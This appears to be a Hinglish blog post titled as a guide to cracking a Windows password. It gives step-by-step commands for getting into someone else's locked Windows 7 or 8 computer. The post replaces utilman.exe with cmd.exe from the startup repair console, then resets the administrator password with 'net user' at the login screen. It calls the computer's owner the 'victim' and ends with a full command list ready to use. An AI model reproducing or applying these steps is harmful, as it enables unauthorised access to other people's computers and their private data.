Cracking Windows Paasword in hindi

Agar aap ko kisi ka Pc Use karna ho or usme paasword laga ho to aap use use nahi kar sakte hai.Par agar aap ko usse use karna ho to isliye aap niche diye hue tutorial ka use kijiye.

Is liye hame sabse pahle CMD ki jarurat hogi par agar aap ka pc lock hai to ye normel user ke liye possible nahi hai.par hum to hacking sikh rahe hai isliye aap ko PC ko direct switch se band kar dena hoga.jis se aap ko set up repair window show hogi.

Ab aap ko 1st Option Lunch Startup repair par click karna hai.Fir aap ko iske baad  CMD option dikhai dega. us par click karke CMD open kijiye fir isk baad aapko cmd me likna hoga 
diskpart

uske baad likhiye list volume jis se aapko saare partition dikhai dega.isse aap ko pata chal jaayega ki  windows kaha install kiya gaya hai.
fir aap ko exit type karna hoga
agar aap ke victim ke pc me windows d drive me install hai to aap ko D drive me jaana hoga isliye aapko D: type karna hoga iske baad aap D drive me aa jaayege .
fir dir commond dijiye isse aap ko pata chal jaayega ki windows forder us drive me hai.
is ke baad aap ko windows/system32 me jaana hai.
Kyo ki isi me hame windows ka ek bug dikhai dega vo bug hai utilman.exe is ke jagah hame cmd lana hai kyo ki utilman.exe program aap ko login screen pe dikhahi hoga.
to ab aap ko niche diye hue command dene hoge 
cd windows
cd system32 
is se aap system 32 me aa jaayege
fir aap ko utilman.exe ko rename karna hoga isliye aap ko ren command dena hoga
isliye niche diye hue command insert kijiye
ren utilman.exe utilman.exe.back (ise naye naam se save karne ke liye.)fir enter dijiye.
ab hum utilman.exe naam command prompt ko de dege is liye hume utilman.exe ko copy karna hoga isliye aap niche diye hue command type karna hoga

copy cmd.exe utilman.exe
fir aapko copy ka messeg aa yega bas aap ne utilman.exe ki jagah par cmd copy kar diya hai..

bas ab aap ko sysem ko fir se reboot karna hoga.isliye restart button dabaye fir aap ka login screen aa jane de .fir aap ko niche di gayi image me dikhai gaye icon par click karna hoga.


jab aap is par click karge to cmd open hoga.
ab ham paasword ko bypaas karege
isliye type kijiye
net user to aap ko user ki list dikhai degi jaise ki agar aap ka administration account Shailandra hai to aap ko fir se type karna hoga

net user shailandra (paasword) paasword ki jagah par aap koi bhi paasword use kar sakte hai isse aap ka paasword crack hojaayega aap apne diye hue paasword se login kar sakte hai.

Complate Commands

diskpart
exit
cd D:
dir
cd windows

cd system32


ren utilman.exe utilman.exe.back

copy cmd.exe utilman.exe

than reboot and open cmd and use this command

net user 

net user {administer account} (your decided paasword)

agar aap ko koi bhi problem aaye to aap comment me likh sakte hai.


Ye trick Windows 7 or 8 me kaam karti hai.
Previous
Next Post »